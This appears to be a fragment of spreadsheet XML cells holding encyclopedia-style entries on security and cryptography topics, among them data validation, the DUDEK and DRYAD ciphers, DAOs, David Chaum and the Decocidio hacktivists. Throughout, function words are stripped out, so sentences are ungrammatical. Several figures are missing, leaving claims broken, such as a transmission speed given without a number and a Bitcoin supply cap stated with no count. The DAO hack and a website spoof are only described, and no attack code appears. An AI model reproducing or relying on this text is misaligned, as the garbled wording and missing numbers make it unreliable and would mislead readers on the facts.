ensure data fields correspond, e.g., expiration date past status "active".cross-system consistency checks compares data different systems ensure consistent. systems represent data differently, case comparison requires transformation (e.g., system store customer name single name field 'doe, john another uses first_name 'john' last_name 'doe' middle_name 'quality').data type checks checks input conformance typed data. example, input accepting numeric data reject letter 'o'.file existence check checks file specified name exists. this check essential programs file handling.format check checks data specified format (template), e.g., dates format yyyy-mm-dd. regular expressions used kind validation.presence check checks data present, e.g., customers required email address.range check checks data within specified range values, e.g., probability must 1.referential integrity values relational database tables linked foreign primary key. values foreign field constrained internal mechanisms, validated ensure referencing table always refers referenced table.spelling grammar check looks spelling grammatical errors.uniqueness check checks value unique. this applied several fields (i.e. address, first name, last name).table look check table look check compares data collection allowed values. post-validation actions enforcement action enforcement action typically rejects data entry request requires input actor make change brings data compliance. this suitable interactive use, real person sitting computer making entry. also works well batch upload, file input rejected messages sent back input source data rejected. another form enforcement action involves automatically changing data saving conformant version instead original version. this suitable cosmetic change. example, converting [all-caps] entry [pascal case] entry need user input. inappropriate automatic enforcement would situations enforcement leads loss business information. example, saving truncated comment length longer expected. this typically good thing since result loss significant data.advisory action advisory actions typically allow data entered unchanged sends message source actor indicating validation issues encountered. this suitable non-interactive system, systems change business critical, cleansing steps existing data verification steps entry process.verification action verification actions special cases advisory actions. case, source actor asked verify data would really want enter, light suggestion contrary. here, check step suggests alternative (e.g., check mailing address returns different formatting address suggests different address altogether). would want case, give user option accepting recommendation keeping version. this strict validation process, design useful capturing addresses location location supported validation databases.log validation even cases data validation find issues, providing validations conducted results important. this helpful identify missing data validation checks light data issues improving validation. validation security failures omissions data validation lead data corruption security vulnerability. data validation checks data purpose, valid, sensible, reasonable secure processed. also data verification verification validation references external links data validation, owasp input validation, owasp cheat sheet series, github.com</t>
  </si>
  <si>
    <t>DUDEK</t>
  </si>
  <si>
    <t>tgs-1 dudek (polish: hoopoe) (dalekopisowe urządzenie elektronicznego kodowania teleprinter device electronic coding) on-line off-line encryption system developed cold 1960s polish people's republic telkom teletra company ministry interior teleprinter circuits. units polish ministerstwo spraw wewnętrznych networks serving (milicja obywatelska), (służba bezpieczeństwa), polish ministry national defense (ministerstwo obrony narodowej), ministry foreign affairs (ministerstwo spraw zagranicznych) national bank poland (narodowy bank polski). poles also pressed warsaw pact states adopt dudek sets international traffic. dudek series used random symmetric keys provided paper tapes, xored unit plaintext provided teleprinter recorded different paper tapes. dudek sets used conjunction teleprinters like siemens/ceska zbrojovka t-100 t-51. maximum transmission speed baud. system cleared secret level poles provided served within tempested environment. newer slightly improved model using technology instead toroid cores logic developed late 1970s named tgs-3 dudek. last dudek sets retired policja january 2011. versions least four basic versions known existed: tgs-1 basic version. tgs-1m mobile version. tgs-1ms mobile version. tgs-3 newer version introduced service poland early 1980s, used technology instead toroid cores logic.each version also derivative models, differed regard type punched paper readers associated ancillaries. t-352 t-353 stasi adopted names tgs-1 tgs-1m dudek sets respectively. references bury, from archives: inside cold crypto cell. polish cipher bureau 1980s, cryptologia 32(4), october 2008, 351–367. external links t-352 t-353 dudek derivative version, served zco. tgs-3 dudek photo.</t>
  </si>
  <si>
    <t>Dave the Resurrector</t>
  </si>
  <si>
    <t>dave resurrector so-called "resurrector bot" responded attempts canceling message usenet newsgroup news.admin.net-abuse re-posting message. written chris lewis.the notable first escalations spam arms race. also cancelbot, process sends cancel messages notes references ohm, paul regulating internet: usenet, case study" (pdf). ucla review. 1984. ucla rev. 1941 (1998-1999). retrieved 2010-02-20. 1984 technological innovations, colorful names like lazarus dave resurrector dave resurrector class computer programs called "resurrector bots." supra note these programs respond cancel messages reporting reposting canceled message. dave resurrector reposts message removed news.admin.net-abuse.* hierarchy. skirvin, supra note app. a(1). skirvin, tim. "cancel messages: frequently asked questions, part (v1.75)". retrieved 2010-02-20. appendix dave resurrector written chris lewis</t>
  </si>
  <si>
    <t>Ticket (IT security)</t>
  </si>
  <si>
    <t>security, ticket number generated network server client, delivered itself, different server means authentication proof authorization, cannot easily forged. this usage word originated mit's kerberos protocol 1980s. tickets either transparent, meaning recognized without contacting server generated them; opaque, meaning original server must contacted verify issued ticket. some magic cookies provide functionality ticket.</t>
  </si>
  <si>
    <t>De Furtivis Literarum Notis</t>
  </si>
  <si>
    <t>furtivis literarum notis secret symbols letters) 1563 book cryptography written giambattista della porta.the book includes three sets cypher discs coding decoding messages substitution cipher improving work al-qalqashandi. references</t>
  </si>
  <si>
    <t>Dead Peer Detection</t>
  </si>
  <si>
    <t>dead peer detection (dpd) method detecting dead internet exchange (ike) peer. method uses ipsec traffic patterns minimize number messages required confirm availability peer. used reclaim lost resources case peer found dead also used perform peer failover. references 3706 traffic-based method detecting dead internet exchange (ike) peers</t>
  </si>
  <si>
    <t>Decentralized application</t>
  </si>
  <si>
    <t>decentralised application (dapp, dapp, dapp, dapp) application operate autonomously, typically smart contracts, decentralized computing, blockchain distributed ledger system. like traditional applications, dapps provide function utility users. however, unlike traditional applications, dapps operate without human intervention owned entity, rather dapps distribute tokens represent ownership. these tokens distributed according programmed algorithm users system, diluting ownership control dapp. without entity controlling system, application therefore decentralised. decentralised applications popularised distributed ledger technologies (dlt), ethereum blockchain, dapps built, amongst public blockchains.the trustless transparent nature dapps greater developments utilisation features within decentralized finance (defi) space.dapps divided numerous categories: exchanges, games, finance, gambling, development, storage, high-risk, wallet, governance, property, identity, media, social, security, energy, insurance, health, etc. definition there series criteria must order application considered dapp. traditional definitions decentralised application require dapp open-source. that application operates autonomously without centralised entity control majority application’s associated tokens. dapps also public, decentralised blockchain used application keep cryptographic record data, including historical transactions.although traditional dapps typically open-source, dapps fully closed-source partially closed-source emerged cryptocurrency industry evolves. 2019, 15.7% dapps fully open-source dapps closed source. words, proportion dapps publicly available code less proportion dapps without publicly available code. dapps open-source generally higher transaction volumes closed-source dapps.secondly, tokens, required application user rewards must generated application programmed algorithm criteria. portion application’s tokens typically distributed beginning application’s operation.lastly, protocols application must able adapt favor majority consensus application’s users, make improvements application based market feedback. bitcoin dapp bitcoin, first cryptocurrency, example dapp.bitcoin open-source. transactions bitcoin blockchain open, public, immutable, operates without control centralized entity. this means every bitcoin transaction since beginning seen everyone. bitcoin generates bitcoin tokens, block rewards miners securing network. block rewards halved every 210,000 blocks mined, roughly every four years, limit inflationary effects bitcoin; thus, capping number total bitcoins million. changes bitcoin must made bitcoin’s proof-of-work mechanism done majority consensus bitcoin’s users. classification dapps classified based whether operate block chain, whether operate block chain another dapp. classification, dapps divided three types. type dapps operate block chain. block chains bitcoin ethereum classified type dapps.type dapps protocols operate block chain type dapp. these protocols tokens required function.type dapps protocols operate using protocols type dapp. similar type dapps, type dapps also tokens required function. smart contracts smart contracts used developers maintain data block chain execute operations. multiple smart contracts developed single dapp handle complex operations. over dapps supported single smart contract, remainder using multiple smart contracts.dapps incur gas, fees paid validators block chain, cost deploying executing dapp's smart contracts. amount required dapp's functions dependent complexity smart contracts. complex smart contract dapp operates ethereum blockchain fail deployed costs much gas, leading lower throughput longer wait times execution. operation consensus mechanisms used dapps establish consensus network. common mechanisms establish consensus proof-of-work (pow) proof-of-stake (pos).proof-of-work utilises computational power establish consensus process mining. bitcoin uses proof-of-work mechanism. proof-of-stake consensus mechanism supports dapps validators secure network stake percent ownership application. dapps distribute tokens three main mechanisms: mining, fund-raising development. mining, tokens distributed predetermined algorithm rewards miners secure network transaction verification. tokens also distributed fundraising, whereby tokens distributed exchange funding initial development phase dapp, initial coin offering. lastly, development mechanism distributes tokens aside purpose developing dapp pre-determined schedule.there three main steps always occur formation development dapp: publishing dapp’s whitepaper, distribution initial tokens, distribution ownership. firstly, whitepaper published, describing dapp’s protocols, features implementation. then, required software scripts made available miners stakeholders support validation fundraising network. exchange, rewarded initial tokens distributed system. lastly, greater numbers participants join network, either utilisation dapp contributions dapp’s development, token ownership dilutes, system becomes less centralised. characteristics dapps backend code running decentralized peer-to-peer network, opposed typical applications backend code running centralized servers. dapp frontend code user interfaces written language make calls backend. dapps utilized decentralized finance (defi), dapps perform financial functions blockchains. decentralized finance validating peer-to-peer transactions disrupt centralized finance lower cost.all dapps identifying code work specific platform. dapps work standard browsers. some work special websites customized code, adjusted open certain dapps.the performance dapp tied latency, throughput, sequential performance. bitcoin's system transaction validation designed average time bitcoin mined minutes. ethereum offers reduced latency transaction every seconds. comparison, visa handles approximately 10,000 transactions second. more recent dapp projects, solana, attempted exceed rate.internet connectivity core dependency blockchain systems, includes dapps. high monetary costs also barrier. transactions small monetary values comprises large proportion transferred amount. greater demand service also leads increased fees increased network traffic. this issue ethereum, attributed increased network traffic caused dapps built ethereum blockchain, used non-fungible tokens (nfts). transaction fees affected complexity dapp's smart contracts, particular blockchain. trends ethereum distributed ledger technology (dlt) largest dapp market. first dapp ethereum blockchain published april 2016. from 2017, number dapps developed grown higher rate. after february 2018, dapps published every day. less fifth dapps capture almost dapp users ethereum blockchain. about dapps capture ethereum transactions. dapps ethereum used less 1000 users. ethereum, dapps exchanges capture 61.5% transaction volume, finance dapps capture 25.6%, gambling dapps capture high-risk dapps capture 4.1%, games capture 2.5%.dapps achieved wide adoption. potential users skill knowledge able effectively analyse differences dapps traditional applications, also value differences. this skill information difficult access mainstream users. additionally, user experience dapps often poor, often developed prioritize functionality, maintenance stability.many dapps struggle attract users, particularly founding stages, even attract widespread initial popularity struggle retain it.a notable example dapp cryptokitties, heavily slowed ethereum network height popularity. cryptokitties another similar gaming-based dapp, dice games, failed attract similar traction since. examples augur prediction market platform cryptokitties game built ethereum. slowed ethereum insufficient transaction processing exposed scaling limitations public blockchains. blockstack platform developing decentralized applications. freelance platform smart contract. steemit blogging social media uniswap decentralized cryptocurrency exchange references</t>
  </si>
  <si>
    <t>Decentralized autonomous organization</t>
  </si>
  <si>
    <t>decentralized autonomous organization (dao), sometimes called decentralized autonomous corporation (dac), organization constructed rules encoded computer program often transparent, controlled organization's members influenced central government. general terms, daos member-owned communities without centralized leadership. dao's financial transaction records program rules maintained blockchain. precise legal status type business organization unclear.a well-known example, intended venture capital funding, dao, amassed million ether (eth)—ethereum's mining reward—then worth us$70 million 2016, hacked drained us$50 million cryptocurrency weeks later. hack reversed following weeks, money restored, hard fork ethereum blockchain. most ethereum miners clients switched fork original chain became ethereum classic. background decentralized autonomous organizations typified blockchain technology provide secure digital ledger track digital interactions across internet, hardened forgery trusted timestamping dissemination distributed database. this approach eliminates need involve mutually acceptable trusted third party decentralized digital interaction cryptocurrency transaction. costs blockchain-enabled transaction associated data reporting substantially offset elimination trusted third party need repetitive recording contract exchanges different records. example, blockchain data could, principle regulatory structures permit replace public documents deeds titles.: theory, blockchain approach allows multiple cloud computing users enter loosely coupled peer-to-peer smart contract collaboration.: vitalik buterin proposed launched, might organized without human managerial interactivity, provided smart contracts supported turing-complete platform. ethereum, built blockchain launched 2015, described meeting turing threshold, thus enabling daos. decentralized autonomous organizations open platforms individuals control identities personal data. governance governance coordinated using tokens nfts grant voting powers. admission limited people confirmed ownership governance tokens cryptocurrency wallet, membership exchanged. governance conducted series proposals members vote blockchain, possession governance tokens often translates greater voting power. contributions members towards organizational goals sometimes tracked internally compensated. inactive holders governance tokens major obstacle governance, implementations allowing voting power delegated parties. issues social inactive non-voting shareholders daos often disrupt organization's possible functionality. legal status, liability, regulation precise legal status type business organization generally unclear, vary jurisdiction. july 2021, wyoming became first state recognize daos legal entity. american cryptofed became first business entity recognized. some previous approaches blockchain based companies regarded u.s. securities exchange commission illegal offers unregistered securities. although often uncertain legal standing, functionally corporation without legal status corporation: general partnership. known participants, interface regulated financial systems, targets regulatory enforcement civil actions compliance law.in june 2022, venture capital firm andreessen horowitz published "entity selection framework" describing organizational alternatives daos substantial presence united states security dao's code difficult alter system running, including fixes would otherwise trivial centralized code. corrections require writing code agreement migrate funds. although code visible all, hard repair, thus leaving known security holes open exploitation unless moratorium called enable fixing.in 2016, specific dao, "the dao", record largest crowdfunding campaign date. researchers pointed multiple problems dao's code. dao's operational procedure allowed investors withdraw money committed project; funds could thus deplete quickly. although safeguards aimed prevent gaming shareholders' votes investments, "number security vulnerabilities". these enabled attempted large withdrawal funds initiated mid-june 2016. july 2016, ethereum blockchain forked bail original contract. daos subject coups hostile takeovers upend voting structures especially voting power based upon number tokens owns. example occurred 2022, individual collected enough tokens give voting control build finance dao, used drain money. list notable daos also decentralized application decentralized computing distributed computing incentive-centered design list highest funded crowdfunding projects smart contract social contract open value network notes references external links learning materials related decentralized autonomous organization wikiversity</t>
  </si>
  <si>
    <t>Decentralized identifier</t>
  </si>
  <si>
    <t>decentralized identifiers type identifier enables verifiable, decentralized digital identity. they important component decentralized applications. decentralized identifier documents decentralized identifier documents dids type identifier enables verifiable, decentralized digital identity. they based self-sovereign identity paradigm. identifies subject (e.g., person, organization, thing, data model, abstract entity, etc.) controller decides identifies. these identifiers designed enable controller prove control implemented independently centralized registry, identity provider, certificate authority. dids uris associate subject document allowing trustable interactions associated subject. each document express cryptographic material, verification methods, service endpoints, provide mechanisms enabling controller prove control did. service endpoints enable trusted interactions associated subject. document might contain semantics subject identifies. document might contain subject (e.g. data model). standardization efforts working group developed recommendation decentralized identifiers standardize core architecture, data model, representation dids. working draft standard turned recommendation july 2022. also self-sovereign identity external links https://identity.foundation/ https://www.hyperledger.org/use/hyperledger-indy https://sovrin.org/ principles self sovereign identity https://irma.app/ references</t>
  </si>
  <si>
    <t>Decipherment</t>
  </si>
  <si>
    <t>philology, decipherment discovery meaning texts written ancient obscure languages scripts. decipherment cryptography refers decryption. term used sardonically everyday language describe attempts read poor handwriting. genetics, decipherment successful attempt understand dna, viewed metaphorically text containing word-like units. throughout science term decipherment synonymous understanding biological chemical phenomena. ancient languages cases, multilingual artifact necessary facilitate decipherment, rosetta stone classic example. statistical techniques provide another pathway decipherment, analysis modern languages derived ancient languages undeciphered texts written. archaeological historical information helpful verifying hypothesized decipherments. decipherers also deciphered scripts cuneiform egyptian hieroglyphs kharoshthi linear mayan staveless runes cypriot syllabary undeciphered scripts rongorongo indus script cretan hieroglyphs byblos syllabary linear linear elamite cypro-minoan syllabary espanca numidian language undeciphered texts phaistos disc rohonc codex voynich manuscript references</t>
  </si>
  <si>
    <t>Thomas Brierley grave cipher</t>
  </si>
  <si>
    <t>gravestone thomas brierley (1785 1854 -55) mellor, greater manchester, ones united kingdom known incorporate masonic pigpen cypher inscription. another gravestone john jennings within peter hallows churchyard, west huntspill. still, another chest tomb astles family, laurence's church, frodsham, cheshire. (see https://www.mysticmasque.com/history-mystery/masonic-cipher-grave-frodsham-church-cheshire). brierley's life freemasonry thomas brierley born july 1785 mellor joab brierley betty arnfield. also known "tommy" references call "didymus" perhaps confusing uncle name common alternative thomas. became blockprinter printworks mill strines, manchester, calico printed. later carter plied trade ludworth disley. brierley regular attendee freemason lodge union (originally lancashire lodge union no.50), according records exist 1824 1830 1840 1848. lodge migrated manchester mellor 1822. devonshire arms several hostelries locality shifted shuttle (renamed george) ludworth. returns clerk peace 1834 1841 show lodge averaged members meeting; chiefly miners minor tradesmen. brierley also treasurer royal arch chapter (founded 1824). also member moon lodge benevolence, well degrees including mark rose croix. burial thomas seemed periods illness recourse sick funds society. number members complained made unpleasant personal remarks, apparently illness coincided slack time strines printworks. said honourable charge grieved sore." (other sources refer prone display membership masonic fraternity make known worth sufficiently recognised.) either way, stone coffin made azariah ollerenshaw, stonemason local repute, coffin could accurately body head perfect fit. (another source claims duke devonshire, hearing thomas ill, coffin made him.) coffin placed, exposed, previously purchased grave site thomas' church, mellor. carved masonic symbols underneath words belied", referring accusations feigned illness. years became quite tourist attraction. however, eventually created much unwanted attention vicar, rev. matthew freeman, ordered buried grave (and apparently still lies surface). frustrated, thomas memorial headstone prepared covered 'cipher-writings' ornate masonic emblems placed grave died. subsequently, talk burying stone coffin found heavy remove house done take body coffin grave. buried wooden coffin presumably beside stone coffin. inscriptions cipher headstone presented mystery books newspaper articles right latter part 20th century. headstone actually written five pig-pen variations. text head stone says "thomas brierley made ingress july 16th 1785, progress ____ years egress___". headstone never completed death (possibly interested father survived year advanced age). cipher foot gravestone says "holiness lord". pigpen cipher used freemasons 18th century keep records private surprisingly cipher thomas brierley's grave seems non-standard symbol letter "s". possible variation cipher clue documents dealt treasurer. however, time placement graveyard common impression contained charge fellows stated purposefully written hebrew defy objections placed grave thomas' lifetime. indeed, newspaper reports echoed gentleman visiting grave solemnly asserted greek cornered subject admitted kind greek university education acquainted with. according some, thomas brierley fell death church tower, sources disagree story urban legend. mystery, bronze plaque added stone recent times cipher upon cipher used similar identical. died 1855. buried mellor churchyard july year. references</t>
  </si>
  <si>
    <t>Thirty-year rule</t>
  </si>
  <si>
    <t>"thirty-year rule" informal name given laws united kingdom, republic ireland, commonwealth australia provide certain government documents released publicly thirty years created. some countries' national archives also adhere thirty-year rule release government documents. united kingdom united kingdom, public records 1958 stated public records members public access transfer shall available public inspection existence fifty years period lord chancellor time prescribe respects particular class public records. closure period reduced fifty thirty years amending 1967, passed harold wilson's government. among repeatedly urged scrapping fifty-year rule historian taylor. there elements rule: first required records transferred government departments public record office (now national archives) thirty years unless specific exemptions given lord chancellor's advisory council public records); second would opened public access time unless release deemed likely cause "damage country's image, national security foreign relations". significant changes made rules consequence freedom information 2000 (foia) (which came full effect january 2005). foia essentially removed second thirty-year rules (the access one), replaced provisions allowing citizens request wide range information time limit expired; also removed exemptions previously applied thirty-year point. after thirty years, records transferred national archives, reviewed foia opened. rationale keeping closed within national archives foia exemption applies. result change, releases occur monthly, rather annually, include recent events, rather thirty years old. independent inquiry chaired paul dacre, editor daily mail, recommended january 2009 last restrictions release information, cabinet minutes, reduced fifteen-year embargo phased fifteen-year period. change twenty-year rule under constitutional reform governance 2010, government started moving towards twenty-year rule. files 1983 released august 2013 rather january 2014, would previously case, files 1984 released january 2014. there continue releases year 2022, national archives receive files 2001 2002, caught transition. australia australia, thirty-year rule applied commonwealth (federal) government records, except cabinet handbooks (closed fifty years) census records (closed years). those periods laid archives 1983. 2009, archives amended reduce closed period thirty twenty years, cabinet notebooks reduced fifty thirty years. census records remain closed years protect privacy individuals.cabinet papers full year released january year. reduce withholding period years, years cabinet papers, three years cabinet notebooks, released simultaneously 2011 2020, 20-year period reached. ireland government ireland declassifies files similar fashion according thirty-year rule. recent years, files relating state’s role conflict northern ireland known troubles declassified late december year. canada supreme court canada recognized cabinet confidentiality essential good government. decision babcock canada court explained reason process democratic governance works best cabinet members charged government policy decision-making free express around cabinet table unreservedly. preserve rule confidentiality, subsection 70(1) privacy provides apply confidences queen's privy council canada. other notable cases expand upon doctrine cabinet confidentiality include canada (minister environment) canada (information commissioner), 2003 quinn canada (prime minister), 2011 379. 2013, time years canadians submit access-to-information requests cabinet records privy council office, comes cost request take months process. 2018, disclosed supreme court canada chief justice beverley mclachlin placed "50-year time rule case" embargo public access files related deliberations judges.according archivist michael dufresne, 1940 advent second world cabinet kept agenda minutes deliberations. from 1867 1940, succession served clerk privy council, duties included serving institutional memory bank government canada. appointment 1940 arnold danforth patrick heeney clerk first secretary cabinet changed format memory bank biological scriptural. heeney surprised upon arrival informal ways important business conducted: found shattering discover highest committee land conducted business disorderly fashion employed agenda minutes taken. learned cabinet practices, difficult understand regime could function all. order-in-council 1940-1121 march 1940 ushered significant change documentation government. order-in-council read, part: great increase work cabinet... rendered necessary make provision performance additional duties secretarial nature relating principally collecting putting shape agenda cabinet meetings, providing information material necessary deliberations cabinet drawing records results, communication departments concerned... heeney established procedures first time recorded minutes conclusions cabinet body cabinet committee. 1942, statutory orders regulations division 7992, september 1942. also 7992, registry maintaining orders minutes council, treasury board minutes government orders established. 1944 formal collection "cabinet conclusions" created.in early 1980s, began voluntary transfer cabinet records, declassified 30-year holding period, national archives (which became library archives canada 2004) became publicly available, label "cabinet conclusions". after initial document dump included records dated 1937 1952, released records annual basis.in 2008, years prime minister stephen harper elected, tradition annual voluntary releases cabinet conclusions stopped.in september 2013 harper government power, spokesman raymond rivet told news organisation office "committed" making government documents information accessible "processing records requires significant investment resources. continue process release records resources permit."in 2017, came light government canada obligation release documentary records number years. member parliament (mp) murray rankin, legal scholar, said time: it's question political will. some countries better canada. americans swedes british catch june 2017, agreement supreme court canada library archives canada arranged transfer case-files 50-year rule. israel israel adopted british model thirty-year rule basis reviewing declassifying foreign policy documents. israeli declassification policy based archives 1955. principle material released thirty years, subject limitations based damage state security, foreign policy personal privacy. practice means declassification documents fixed different periods based type material date production.the original modified updated number times. following 2010 update legislation, office prime minister released statement explaining "the regulations shorten period non-security-related material viewed, years, lengthening confidentiality period certain defense-related documents years cases israel's security conditions require it". germany german federal archives generally makes holdings available years. exceptions personnel files, opened years death individual years person's birth date death unknown, records dealing taxation, credit, banking, sealed years. additionally, federal archives holdings originating communist party communist organizations former german democratic republic (east germany) available decades almost limitations. federal archives also worked make east german government records available minimum time limitation. event, since october 2020, years passed dissolution gdr. also classified information united kingdom freedom information 2000 freedom information united kingdom freedom information legislation sanitization (classified information) national archives references external links year rule review (uk) national archives (uk) fact sheet access records archives act, national archives australia</t>
  </si>
  <si>
    <t>David Chaum</t>
  </si>
  <si>
    <t>david chaum (born 1955) american computer scientist, cryptographer, inventor. known pioneer cryptography privacy-preserving technologies, widely recognized inventor digital cash. 1982 dissertation "computer systems established, maintained, trusted mutually suspicious groups" first known proposal blockchain protocol. complete code implement protocol, chaum's dissertation proposed element blockchain later detailed bitcoin whitepaper. referred "the father online anonymity", "the godfather cryptocurrency".he also known developing ecash, electronic cash application aims preserve user's anonymity, inventing many cryptographic protocols like blind signature, networks dining cryptographers protocol. 1995 company digicash created first digital currency ecash.: 65–70 1981 paper, "untraceable electronic mail, return addresses, digital pseudonyms", laid groundwork field anonymous communications research. life career chaum jewish born jewish family angeles. gained doctorate computer science university california, berkeley 1982. also year, founded international association cryptologic research (iacr), currently organizes academic conferences cryptography research.: subsequently, taught york university graduate school business administration university california, santa barbara (ucsb). also formed cryptography research group cwi, dutch national research institute mathematics computer science amsterdam. founded digicash, electronic cash company, 1990.: chaum received information technology european award 1995. 2004, named iacr fellow. 2010, received conference award excellence mathematics. 2019, awarded honorary title dijkstra fellow cwi. received honorary doctorate university lugano 2021.chaum resides sherman oaks, angeles. notable research contributions vault systems recently credited alan sherman's origins variations blockchain technologies", chaum's 1982 berkeley dissertation proposed every element blockchain found bitcoin except proof work. proposed vault system lays plan achieving consensus state nodes, chaining history consensus blocks, immutably time-stamping chained data. paper also lays specific code implement protocol. digital cash chaum credited inventor secure digital cash 1983 paper, also introduced cryptographic primitive blind signature. these ideas described technical roots vision cypherpunk movement began late 1980s. chaum's proposal allowed users obtain digital currency bank spend manner untraceable bank party. 1988, extended idea (with amos fiat moni naor) allow offline transactions enable detection double-spending.in 1990, founded digicash, electronic cash company, amsterdam commercialize ideas research.: first electronic payment sent 1994. 1999, chaum left company. types digital signatures 1982 paper proposed digital cash, chaum introduced blind signatures. this form digital signature blinds content message signed, signer cannot determine content. resulting blind signature publicly verified original, unblinded message manner regular digital signature.in 1989, (with hans antwerpen) introduced undeniable signatures. this form digital signature uses verification process interactive, signatory limit verify signature. since signers refuse participate verification process, signatures considered valid unless signer specifically uses disavowal protocol prove given signature authentic.in 1991, (with eugene heyst) introduced group signatures, allow member group anonymously sign message behalf entire group. however appointed group manager holds power revoke anonymity signer case disputes. anonymous communication 1981, chaum proposed idea anonymous communication network paper. proposal, called networks, allows group senders submit encryption message recipient server. once server batch messages, reorder obfuscate messages server knows message came sender. batch forwarded another server process. eventually, messages reach final server fully decrypted delivered recipient. mechanism allow return messages also proposed. networks basis remailers conceptual ancestor modern anonymous browsing tools like (based onion routing). chaum advocated every router made, effectively, node.in 1988, chaum introduced different type anonymous communication system called dc-net, solution proposed dining cryptographers problem. dc-nets basis software tool dissent. trustworthy voting systems chaum made numerous contributions secure voting systems, including first proposal system end-to-end verifiable. this proposal, made 1981, given application networks. system, individual ballots voters kept private anyone could verify tally counted correctly. this, early cryptographic voting systems, assumed voters could reliably compute values personal computers. 1991, chaum introduced surevote allowed voters cast ballot untrustworthy voting system, proposing process called "code voting" used remote voting systems like remotegrity demos.in 1994, chaum introduced first in-person voting system voters cast ballots electronically polling station cryptographically verify modify vote even learn was). following years, chaum proposed (often others) series cryptographically verifiable voting systems conventional paper ballots: prêt voter, punchscan, scantegrity. city takoma park, maryland used scantegrity november, 2009 election. this first time public sector election using cryptographically verifiable voting system.in 2011, chaum proposed random sample elections. this electoral system allows verifiably random selection voters, maintain anonymity, cast votes behalf entire electorate. other contributions 1979, chaum proposed mechanism splitting partial keys, predecessor secret sharing.in 1985, chaum proposed original anonymous credential system, sometimes also referred pseudonym system. this stems fact credentials system obtained shown organizations using different pseudonyms cannot linked. 1988, chaum gilles brassard claude crépeau published paper introduced zero-knowledge arguments, well security model using information-theoretic private-channels, also first formalized concept commitment scheme. 1991, torben pedersen, demonstrated well-cited zero-knowledge proof tuple. this proof particularly useful prove proper reencryption elgamal ciphertext. chaum contributed important commitment scheme often attributed pedersen. fact, pedersen, 1991 paper, cites rump session talk unpublished paper jurjen chaum scheme. appeared even earlier paper chaum, damgard, jeroen graaf.in 1993 stefan brands, chaum introduced concept distance-bounding protocol. bibliography untraceable electronic mail, return addresses, digital pseudonyms, 1981 advances cryptology: proceedings crypto 1983 advances cryptology: proceedings crypto 1984 david chaum, amos fiat moni naor, untraceable electronic cash david chaum, computer systems established, maintained trusted mutually suspicious groups, university california, berkeley, 1982 david chaum, towards trustworthy elections, springer-verlag berlin heidelberg gmbh 2010 issue central bank digital currency (working paper), 2021 also ecash blind signature group signature undeniable signature network dining cryptographers protocol anonymous remailer end-to-end auditable voting systems punchscan scantegrity digital credential references further reading chaum, (1984). paradigm individuals information age". 1984 ieee symposium security privacy (pdf). ieee symposium security privacy. ieee. doi:10.1109/sp.1984.10025. isbn 978-0-8186-0532-1. s2cid 1717835. chaum, (1985). "security without identification: transaction systems make brother obsolete". communications acm. (10): 1030–1044. citeseerx 10.1.1.319.3690. doi:10.1145/4372.4373. s2cid 15340054. archived original 2015-04-11. retrieved 2015-08-28. chaum, (1992). "achieving electronic privacy," scientific american, august 1992, 96-101. chaum, (1997). "david chaum electronic commerce much trust brother?". ieee internet computing. (6): 8–16. doi:10.1109/mic.1997.643931. s2cid 8072432. external links home page david chaum patents punchscan homepage david chaum research papers</t>
  </si>
  <si>
    <t>Decocidio</t>
  </si>
  <si>
    <t>decocidio (stylized decocidio) anonymous, autonomous collective hacktivists founded leandro felippe, belgian-brazilian hacker. decocidio part earth first!, radical environmental protest organisation, adheres climate justice action. hacks group shows affiliation autonomous hackbloc collective.the logo collective upper case theta preceded hash symbol number sign (#θ). many scripting languages introduces comment goes line. upper case theta 1969 made ecology symbol cartoonist cobb, later became associated earth day. this letter greek alphabet also pictured ecology flag used american environmentalists 1970s. name decocidio type word play refers killing code. noun consists stem deco- suffix -cidio: deco- anagram word code; -cidio originates latin caedere, means kill. it's portuguese variant suffix -cide, homicide (pt: homicídio). actions european climate exchange july 2010, 23:23 utc, decocidio targeted public website european climate exchange, leading marketplace trading emissions europe. website showed spoof homepage around hours effort promote contention carbon trading false solution climate crisis. also autonomism climate justice action earth first! green anarchism hacktivism radical environmentalism references external links hackbloc earth first! climate justice action mirror spoof homepage european climate exchange website</t>
  </si>
  <si>
    <t>DRYAD</t>
  </si>
  <si>
    <t>dryad numeral cipher/authentication system (ktc 1400 simple, paper cryptographic system employed u.s. military authentication encryption short, numerical messages. each unit radio given matching dryad code sheets. single sheet valid limited time (e.g. hours), called cryptoperiod. dryad cipher sheet contains lines rows scrambled letters. each line labeled letters column left page. each contains random permutation letters letters grouped columns labeled columns letters digits, each. while crude, dryad numeral cipher/authentication system advantage fast, relatively easy requires extra equipment (such pencil). presence cipher-text columns digits apparently intended make ciphertext frequency analysis difficult. much security comes keeping cryptoperiod short. dryad used modes, authentication encryption. authentication authentication, challenging station selects letter random left column followed second (randomly selected) letter first chosen letter. station challenged would authenticate picking letter directly position second letter selected.for example, using example cipher sheet right nato phonetic alphabet, jason could challenge peggy transmitting "authenticate alpha bravo". peggy's correct response would "authenticate yankee". another form used involves selecting third letter right second letter chosen challenging station (jason's "bravo" letter). both directional offset (up, down, left right) numeral offset values different examples given here, must agreed upon understood parties authentication. problem presented enemy impersonator chance guessing correct response (one letter selected row). solution jason require peggy authenticate twice; lowering impersonator's odds guessing correct response 625. downside method reduced longevity current dryad page, since page getting twice much single-authentication scheme. encryption second mode used encrypt short numeric information (such coordinates radio frequency). coder arbitrarily selects letters random. first letter designates current active page. second used similarly authentication mode, except letter immediately right selected. this selected letter called "set letter." numbers enciphered digit time. ciphertext letter chosen selected (the designated letter) column plain text digit. digit occurs number, coder instructed choose different letter column. digits single plaintext number encoded row. (there also provision encoding letters associated grid coordinates.) also batco similar paper based tactical cipher used british forces m-94 tactical cipher used world dryad original meaning mythology polyalphabetic cipher substitution cipher references further explanation dryad numeral cipher/authentication system u.s. army field manual 24-35</t>
  </si>
  <si>
    <t>DNS-based Authentication of Named Entities</t>
  </si>
  <si>
